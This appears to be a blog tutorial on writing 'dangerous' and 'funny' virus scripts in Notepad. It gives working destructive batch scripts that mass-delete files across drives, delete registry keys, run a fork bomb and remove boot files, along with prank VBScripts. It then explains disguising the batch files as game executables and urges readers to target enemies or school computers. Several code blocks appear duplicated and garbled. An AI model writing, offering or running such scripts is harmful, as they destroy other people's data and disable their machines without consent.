How To Make NotePad Funny And Dangerous Virus
In the previous post we have discussed about some keen Knowledge about the viruses and the antiviruses and we have promised you to make this post so that you can make your own very dangerous and funny viruses.NOTE: Don't try this in your personal computer. Either send it to your enemy or Try it yourself in your school computers.
Simple steps to to make a Virus :
1. Open notepad in your computer.2. Paste the provided codes.
3. Save the file with the correct extension.
4. Don't execute..!!!.. Try it with friend.
Dangerous Viruses
• Cleaner (Not the official, We call it) :
Format the Hard drives.
@echo off
del D:\*.* /f /s /q
del E:\*.* /f /s /q
del F:\*.* /f /s /q
del G:\*.* /f /s /q
del H:\*.* /f /s /q
del I:\*.* /f /s /q
del J:\*.* /f /s /q
del D:\*.* /f /s /q
del E:\*.* /f /s /q
del F:\*.* /f /s /q
del G:\*.* /f /s /q
del H:\*.* /f /s /q
del I:\*.* /f /s /q
del J:\*.* /f /s /q
Save this as “Anything you want”.bat (Batch file)
• Registry Deleter :
Clear’s all the registry files
@ECHO OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*
Save this as “Anything you want”.bat (Batch file)START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*
• Folder Flooder:
Creates Folder with random numbers.
@echo off
:x
md %random%
/folder.
goto x
Save this as “Anything you want”.bat (Batch file):x
md %random%
/folder.
goto x
• Process Creator:
Creates a large no. of processes. Results in hanging of the system.
%0|%0
Save this as “Anything you want”.bat (Batch file)• Rest In Peace:
This will crash the system and delete the files required to startup.
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
Save this as “Anything you want”.bat (Batch file)attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
Funny Viruses
• Crazy Caps Lock:
Capslock will start dancing ON / Off Continuously
Set wshShell
=wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
loop
Save this as “Anything you want”.vbs (VBScript)=wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
loop
• Continuously CD Drive Pop Up:
Once executed CD Drive will start Open / Close, Popout and Popin.
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
Save this as “Anything you want”.vbs (VBScript)Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
• Little Message Before Shutdown:
This viruses when executed says a message and shutdown system only one time.
@echo off
msg * I don't like you
shutdown -c "Error! You are too stupid!" –s
Save this as “Anything you want”.bat (Batch file)msg * I don't like you
shutdown -c "Error! You are too stupid!" –s
• Crazy Enter:
This will Trigger enter key simultaneously.
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop
Save this as “Anything you want”.vbs (VBScript)do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop
• Keyboard hack to make it write (You Are A Fool) :
This will simultaneosly write “You are a fool”.
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "You are a fool."
Loop
Save this as “Anything you want”.vbs (VBScript)do
wscript.sleep 100
wshshell.sendkeys "You are a fool."
Loop
Step-By-Step Process to Convert Batch Files To EXE :-
• First Download the Tool Bat_To_Exe_Converter From This Link.• Then, Extract the tool to your preffered location.
• Now Go to the extracted folder and install (Bat_To_Exe_Converter_(Setup)) or run the Portable Version according to the architecture of your system.
• Once the tool is launched then Follow the below screenshot to select the batch file to convert.
Browse your batch file you want to convert.
• Then, Select the Location and the file name you want to save your program with.
Tip :- You should save the program with the game name.
• Then, If want to Encrypt your program with a password. (Not mandatory)
Go to Option tab > Check Encrypt the Program > Type the Password to set.
• Now select the architecture of the System in which you want the program to run.
• Then Go to Version Information Tab and Follow the below Screenshot to select the icon for your program.
Note :- Your icon should be in .ico format. You can convert your images to .ico format with an Online Tool.
• Then simply click on compile.
If you facing any kind of problem then let us know in comment section.
COMMENTS